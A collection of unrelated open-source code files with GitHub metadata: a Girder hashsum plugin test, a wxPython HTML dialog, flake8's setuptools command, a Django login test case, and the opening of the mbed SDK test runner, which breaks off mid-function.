Setting().set(hashsum_download.PluginSettings.AUTO_COMPUTE, 'bad')
old = hashsum_download.SUPPORTED_ALGORITHMS
hashsum_download.SUPPORTED_ALGORITHMS = {'sha512', 'sha256'}
Setting().set(hashsum_download.PluginSettings.AUTO_COMPUTE, True)
file = Upload().uploadFromFile(
obj=six.BytesIO(self.userData), size=len(self.userData), name='Another file',
parentType='folder', parent=self.privateFolder, user=self.user)
start = time.time()
while time.time() < start + 15:
file = File().load(file['_id'], force=True)
if 'sha256' in file:
break
time.sleep(0.2)
expected = hashlib.sha256()
expected.update(self.userData)
self.assertIn('sha256', file)
self.assertEqual(file['sha256'], expected.hexdigest())
expected = hashlib.sha512()
expected.update(self.userData)
self.assertIn('sha512', file)
self.assertEqual(file['sha512'], expected.hexdigest())
hashsum_download.SUPPORTED_ALGORITHMS = old
def testManualComputeHashes(self):
Setting().set(hashsum_download.PluginSettings.AUTO_COMPUTE, False)
old = hashsum_download.SUPPORTED_ALGORITHMS
hashsum_download.SUPPORTED_ALGORITHMS = {'sha512', 'sha256'}
self.assertNotIn('sha256', self.privateFile)
expected = hashlib.sha256()
expected.update(self.userData)
# Running the compute endpoint should only compute the missing ones
resp = self.request(
'/file/%s/hashsum' % self.privateFile['_id'], method='POST', user=self.user)
self.assertStatusOk(resp)
self.assertEqual(resp.json, {
'sha256': expected.hexdigest()
})
# Running again should be a no-op
resp = self.request(
'/file/%s/hashsum' % self.privateFile['_id'], method='POST', user=self.user)
self.assertStatusOk(resp)
self.assertEqual(resp.json, None)
file = File().load(self.privateFile['_id'], force=True)
self.assertEqual(file['sha256'], expected.hexdigest())
hashsum_download.SUPPORTED_ALGORITHMS = old
def testGetByHash(self):
hashAlgorithm = 'sha512'
publicDataHash = self._hashSum(self.userData, hashAlgorithm)
privateDataHash = self._hashSum(self.privateOnlyData, hashAlgorithm)
# There are three files with publicDataHash for self.user.
resp = self.request(
'/file/hashsum/%s/%s' % (hashAlgorithm, publicDataHash), user=self.user)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 3)
for file in resp.json:
self.assertEqual(file['sha512'], publicDataHash)
# There is one file with privateDataHash for self.user.
resp = self.request(
'/file/hashsum/%s/%s' % (hashAlgorithm, privateDataHash), user=self.user)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 1)
for file in resp.json:
self.assertEqual(file['sha512'], privateDataHash)
# There are two files with publicDataHash for self.otherUser.
# There is one private file with this hash that otherUser lacks access to.
resp = self.request(
'/file/hashsum/%s/%s' % (hashAlgorithm, publicDataHash), user=self.otherUser)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 2)
for file in resp.json:
self.assertEqual(file['sha512'], publicDataHash)
# No files with privateDataHash for self.otherUser.
resp = self.request(
'/file/hashsum/%s/%s' % (hashAlgorithm, privateDataHash), user=self.otherUser)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 0)
| {
"content_hash": "c9a7b55e93a80b0d6d730aeb8d5c4171",
"timestamp": "",
"source": "github",
"line_count": 347,
"max_line_length": 97,
"avg_line_length": 38.94236311239193,
"alnum_prop": 0.5818841115962406,
"repo_name": "kotfic/girder",
"id": "7374b4971034b798314f63bc972e801759400016",
"size": "14307",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plugins/hashsum_download/plugin_tests/hashsum_download_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "38260"
},
{
"name": "CSS",
"bytes": "54843"
},
{
"name": "Dockerfile",
"bytes": "2482"
},
{
"name": "HCL",
"bytes": "1424"
},
{
"name": "HTML",
"bytes": "139763"
},
{
"name": "JavaScript",
"bytes": "1129529"
},
{
"name": "Mako",
"bytes": "7873"
},
{
"name": "Python",
"bytes": "2117090"
},
{
"name": "Roff",
"bytes": "17"
},
{
"name": "Ruby",
"bytes": "9921"
},
{
"name": "Shell",
"bytes": "2177"
}
],
"symlink_target": ""
} |
"""
HTML Dialog.
Licensed under MIT
Copyright (c) 2013 - 2017 Isaac Muse <isaacmuse@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.
"""
import wx
from ..localization import _
from .. import gui
from ..controls import webview
class HTMLDialog(gui.HtmlDialog, webview.WebViewMixin):
"""HTML dialog."""
def __init__(
self, parent, content, title=None, content_type=webview.HTML_FILE,
min_width=500, min_height=500, max_width=-1, max_height=-1
):
"""Initialize dialog."""
super().__init__(parent)
self.setup_html(self.m_content_html, control_title=self)
self.SetSizeHints(wx.Size(min_width, min_height), wx.Size(max_width, max_height))
self.localize()
self.load(content, title, content_type)
self.Fit()
self.Centre()
def load(self, content, title=None, content_type=webview.HTML_FILE):
"""Reshow the dialog."""
self.refresh_localization()
self.load_html(self.m_content_html, content, title, content_type)
def localize(self):
"""Translate strings."""
self.TITLE = _("Untitled")
def refresh_localization(self):
"""Localize dialog."""
self.SetTitle(self.TITLE)
self.Fit()
def on_cancel(self, event):
"""Close dialog."""
self.Close()
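# Usage sketch (assumptions noted): constructed from an existing wx frame.
# `parent_frame` and "help.html" are hypothetical; HTML_FILE is the only
# content type referenced in this module, and ShowModal()/Destroy() are
# assumed to come from the underlying wx.Dialog base class.
#
#     dlg = HTMLDialog(parent_frame, "help.html", title="Help",
#                      content_type=webview.HTML_FILE)
#     dlg.ShowModal()
#     dlg.Destroy()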
| {
"content_hash": "bf64b8b0134083a1a16087ef2221a9d8",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 113,
"avg_line_length": 36.15625,
"alnum_prop": 0.6992221261884183,
"repo_name": "facelessuser/Rummage",
"id": "95d9bbd77711356d09ac297337900d336233ba6c",
"size": "2314",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rummage/lib/gui/dialogs/html_dialog.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "31788"
},
{
"name": "HTML",
"bytes": "146911"
},
{
"name": "JavaScript",
"bytes": "17430"
},
{
"name": "Python",
"bytes": "1087411"
}
],
"symlink_target": ""
} |
"""The logic for Flake8's integration with setuptools."""
from distutils import log
import os
from typing import List, Tuple
import setuptools
from flake8.main import application as app
UNSET = object()
class Flake8(setuptools.Command):
"""Run Flake8 via setuptools/distutils for registered modules."""
description = "Run Flake8 on modules registered in setup.py"
# NOTE(sigmavirus24): If we populated this with a list of tuples, users
# could do something like ``python setup.py flake8 --ignore=E123,E234``
# but we would have to redefine it and we can't define it dynamically.
# Since I refuse to copy-and-paste the options here or maintain two lists
# of options, and since this will break when users use plugins that
# provide command-line options, we are leaving this empty. If users want
# to configure this command, they can do so through config files.
user_options = [] # type: List[str]
def initialize_options(self):
"""Override this method to initialize our application."""
self.flake8 = app.Application()
self.flake8.initialize([])
options = self.flake8.option_manager.options
for option in options:
if option.parse_from_config:
setattr(self, option.config_name, UNSET)
def finalize_options(self):
"""Override this to parse the parameters."""
options = self.flake8.option_manager.options
for option in options:
if option.parse_from_config:
name = option.config_name
value = getattr(self, name, UNSET)
if value is UNSET:
continue
setattr(
self.flake8.options,
name,
option.normalize_from_setuptools(value),
)
def package_files(self):
"""Collect the files/dirs included in the registered modules."""
seen_package_directories = () # type: Tuple[str, ...]
directories = self.distribution.package_dir or {}
empty_directory_exists = "" in directories
packages = self.distribution.packages or []
for package in packages:
package_directory = package
if package in directories:
package_directory = directories[package]
elif empty_directory_exists:
package_directory = os.path.join(
directories[""], package_directory
)
# NOTE(sigmavirus24): Do not collect submodules, e.g.,
# if we have:
# - flake8/
# - flake8/plugins/
# Flake8 only needs ``flake8/`` to be provided. It will
# recurse on its own.
if package_directory.startswith(seen_package_directories):
continue
seen_package_directories += (package_directory + ".",)
yield package_directory
def module_files(self):
"""Collect the files listed as py_modules."""
modules = self.distribution.py_modules or []
filename_from = "{0}.py".format
for module in modules:
yield filename_from(module)
def distribution_files(self):
"""Collect package and module files."""
for package in self.package_files():
yield package
for module in self.module_files():
yield module
yield "setup.py"
def run(self):
"""Run the Flake8 application."""
self.flake8.run_checks(list(self.distribution_files()))
self.flake8.formatter.start()
self.flake8.report_errors()
self.flake8.report_statistics()
self.flake8.report_benchmarks()
self.flake8.formatter.stop()
try:
self.flake8.exit()
except SystemExit as e:
# Cause system exit only if exit code is not zero (terminates
# other possibly remaining/pending setuptools commands).
if e.code:
raise
finally:
self.announce(
"WARNING: flake8 setuptools integration is deprecated and "
"scheduled for removal in 4.x. For more information, see "
"https://gitlab.com/pycqa/flake8/issues/544",
log.WARN,
)
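# Usage sketch: flake8 itself registers this class under the setuptools
# `distutils.commands` entry point, so a project normally only needs flake8
# importable at setup time and can run the checks with
#
#     python setup.py flake8
#
# configuring options through setup.cfg/tox.ini rather than command-line
# flags (see the empty `user_options` above). As the warning in run() notes,
# this integration is deprecated in favour of invoking the flake8 CLI directly.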
| {
"content_hash": "c8f588997bce11e13cac3f6e83a75f53",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 77,
"avg_line_length": 37.643478260869564,
"alnum_prop": 0.5952875952875953,
"repo_name": "TeamSPoon/logicmoo_workspace",
"id": "fde290e6f2c0b33e1ad3ae54e0245c1548cd3878",
"size": "4329",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "packs_web/butterfly/lib/python3.7/site-packages/flake8/main/setuptools_command.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "342"
},
{
"name": "C",
"bytes": "1"
},
{
"name": "C++",
"bytes": "1"
},
{
"name": "CSS",
"bytes": "126627"
},
{
"name": "HTML",
"bytes": "839172"
},
{
"name": "Java",
"bytes": "11116"
},
{
"name": "JavaScript",
"bytes": "238700"
},
{
"name": "PHP",
"bytes": "42253"
},
{
"name": "Perl 6",
"bytes": "23"
},
{
"name": "Prolog",
"bytes": "440882"
},
{
"name": "PureBasic",
"bytes": "1334"
},
{
"name": "Rich Text Format",
"bytes": "3436542"
},
{
"name": "Roff",
"bytes": "42"
},
{
"name": "Shell",
"bytes": "61603"
},
{
"name": "TeX",
"bytes": "99504"
}
],
"symlink_target": ""
} |
from django.test import TestCase, Client
from django.urls import reverse
from accounts.models import Account
class CoreTestCase(TestCase):
def setUp(self):
self.user = Account.objects.create_user('user', is_active=True)
self.client = Client()
def test_home_page(self):
"""Přihlášený uživatel vidí na adrese '/' domovskou stránku (home.html), zatímco nepřihlášený obrazovku s přihlašovacím odkazem (login.html)."""
# Anonymní uživatel
response = self.client.get('/')
self.assertEqual(response.templates[0].name, 'core/login.html')
self.assertIn('href=\"{}\"'.format(reverse('social:begin', args=('google-oauth2',))), str(response.content))
# Registered user
self.client.force_login(self.user)
response = self.client.get('/')
self.assertEqual(response.templates[0].name, 'core/home.html')
def test_login_required_middleware(self):
"""Testování 'LoginRequiredMiddleware' ve složce 'decorators.py' pro dostupnosti stránek bez a s přihlášením."""
# Bez přihlášení
response = self.client.get(reverse('social:begin', args=('google-oauth2',)))
self.assertEqual(response.status_code, 302)
response = self.client.get('/favicon.ico')
self.assertIn(response.status_code, {200, 301})
response = self.client.get(reverse('accounts:index'))
self.assertEqual(response.status_code, 404)
# With login
self.client.force_login(self.user)
response = self.client.get(reverse('social:begin', args=('google-oauth2',)))
self.assertEqual(response.status_code, 404)
response = self.client.get('/favicon.ico')
self.assertIn(response.status_code, {200, 301})
response = self.client.get(reverse('accounts:index'))
self.assertEqual(response.status_code, 200)
| {
"content_hash": "760ba422bc396534e5114ed09162a21c",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 152,
"avg_line_length": 38.3469387755102,
"alnum_prop": 0.6647152740819585,
"repo_name": "bugulin/gymgeek-web",
"id": "338c0403ff0fe8eefcf5c69195c46e78c01a3e98",
"size": "1914",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "5780"
},
{
"name": "HTML",
"bytes": "18125"
},
{
"name": "Python",
"bytes": "38442"
}
],
"symlink_target": ""
} |
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import optparse
import datetime
import threading
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename
from threading import Thread
from subprocess import Popen, PIPE
# Imports related to mbed build api
from workspace_tools.tests import TESTS
from workspace_tools.tests import TEST_MAP
from workspace_tools.paths import BUILD_DIR
from workspace_tools.paths import HOST_TESTS
from workspace_tools.utils import ToolException
from workspace_tools.utils import construct_enum
from workspace_tools.targets import TARGET_MAP
from workspace_tools.test_db import BaseDBAccess
from workspace_tools.build_api import build_project, build_mbed_libs, build_lib
from workspace_tools.build_api import get_target_supported_toolchains
from workspace_tools.libraries import LIBRARIES, LIBRARY_MAP
from workspace_tools.toolchains import TOOLCHAIN_BIN_PATH
from workspace_tools.test_exporters import ReportExporter, ResultExporterType
import workspace_tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception, _:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print self.single_test.generate_test_summary(test_summary, shuffle_seed)
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows test x toolchain test result matrix
print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_extend_test_timeout=None):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
def execute(self):
clean = self.test_spec.get('clean', False)
test_ids = self.test_spec.get('test_ids', [])
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
# Generate seed for shuffle if seed is not provided in
self.shuffle_random_seed = round(random.random(), self.SHUFFLE_SEED_ROUND)
if self.opts_shuffle_test_seed is not None and self.is_shuffle_seed_float():
self.shuffle_random_seed = round(float(self.opts_shuffle_test_seed), self.SHUFFLE_SEED_ROUND)
for target, toolchains in self.test_spec['targets'].iteritems():
test_suite_properties_ext[target] = {}
for toolchain in toolchains:
# Test suite properties returned to external tools like CI
test_suite_properties = {}
test_suite_properties['jobs'] = self.opts_jobs
test_suite_properties['clean'] = clean
test_suite_properties['target'] = target
test_suite_properties['test_ids'] = ', '.join(test_ids)
test_suite_properties['toolchain'] = toolchain
test_suite_properties['shuffle_random_seed'] = self.shuffle_random_seed
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
continue
T = TARGET_MAP[target]
build_mbed_libs_options = ["analyze"] if self.opts_goanna_for_mbed_sdk else None
clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
try:
build_mbed_libs_result = build_mbed_libs(T,
toolchain,
options=build_mbed_libs_options,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs)
if not build_mbed_libs_result:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
continue
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
return test_summary, self.shuffle_random_seed, test_summary_ext, test_suite_properties_ext
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed if applicable
if self.db_logger:
self.db_logger.reconnect()
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect()
if self.db_logger:
self.db_logger.reconnect()
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
self.db_logger.disconnect()
for test_id in test_map_keys:
test = TEST_MAP[test_id]
if self.opts_test_by_names and test_id not in self.opts_test_by_names.split(','):
continue
if test_ids and test_id not in test_ids:
continue
if self.opts_test_only_peripheral and not test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Common test skipped for target %s'% (target))
test_suite_properties['skipped'].append(test_id)
continue
if self.opts_test_only_common and test.peripherals:
if self.opts_verbose_skipped_tests:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral test skipped for target %s'% (target))
test_suite_properties['skipped'].append(test_id)
continue
if test.automated and test.is_supported(target, toolchain):
if test.peripherals is None and self.opts_only_build_tests:
# When users are using the 'build only' flag and the test does not have
# specified peripherals, we can allow building the test by default
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
else:
print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
test_suite_properties['skipped'].append(test_id)
continue
build_project_options = ["analyze"] if self.opts_goanna_for_tests else None
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
libraries = []
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies:
libraries.append(lib['id'])
# Build libs for test
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
options=build_project_options,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs)
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
return test_summary, self.shuffle_random_seed, test_summary_ext, test_suite_properties_ext
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move the 2 loops below to a separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
MACROS.append('TEST_SUITE_TARGET_NAME="%s"'% target)
MACROS.append('TEST_SUITE_TEST_ID="%s"'% test_id)
test_uuid = uuid.uuid4()
MACROS.append('TEST_SUITE_UUID="%s"'% str(test_uuid))
project_name = self.opts_firmware_global_name if self.opts_firmware_global_name else None
try:
path = build_project(test.source_dir,
join(build_dir, test_id),
T,
toolchain,
test.dependencies,
options=build_project_options,
clean=clean_project_options,
verbose=self.opts_verbose,
name=project_name,
macros=MACROS,
inc_dirs=INC_DIRS,
jobs=self.opts_jobs)
except ToolException:
project_name_str = project_name if project_name is not None else test_id
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building project %s'% (project_name_str))
return test_summary, self.shuffle_random_seed, test_summary_ext, test_suite_properties_ext
if self.opts_only_build_tests:
# With this option we are skipping testing phase
continue
# Test duration can be increased by global value
test_duration = test.duration
if self.opts_extend_test_timeout is not None:
test_duration += self.opts_extend_test_timeout
# For an automated test the duration acts as a timeout after
# which the test gets interrupted
test_spec = self.shape_test_request(target, path, test_id, test_duration)
test_loops = self.get_test_loop_count(test_id)
test_suite_properties['test.duration.%s.%s.%s'% (target, toolchain, test_id)] = test_duration
test_suite_properties['test.loops.%s.%s.%s'% (target, toolchain, test_id)] = test_loops
test_suite_properties['test.path.%s.%s.%s'% (target, toolchain, test_id)] = path
# read MUTs, test specification and perform tests
single_test_result, detailed_test_results = self.handle(test_spec, target, toolchain, test_loops=test_loops)
# Append test results to global test summary
if single_test_result is not None:
test_summary.append(single_test_result)
# Prepare extended test results data structure (it can be used to generate detailed test report)
if toolchain not in test_summary_ext:
test_summary_ext[toolchain] = {} # test_summary_ext : toolchain
if target not in test_summary_ext[toolchain]:
test_summary_ext[toolchain][target] = {} # test_summary_ext : toolchain : target
if test_id not in test_summary_ext[toolchain][target]:
test_summary_ext[toolchain][target][test_id] = detailed_test_results # test_summary_ext : toolchain : target : test_id
test_suite_properties['skipped'] = ', '.join(test_suite_properties['skipped'])
test_suite_properties_ext[target][toolchain] = test_suite_properties
if self.db_logger:
self.db_logger.reconnect()
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _status_fk=self.db_logger.BUILD_ID_STATUS_COMPLETED)
self.db_logger.disconnect()
return test_summary, self.shuffle_random_seed, test_summary_ext, test_suite_properties_ext
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows test x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
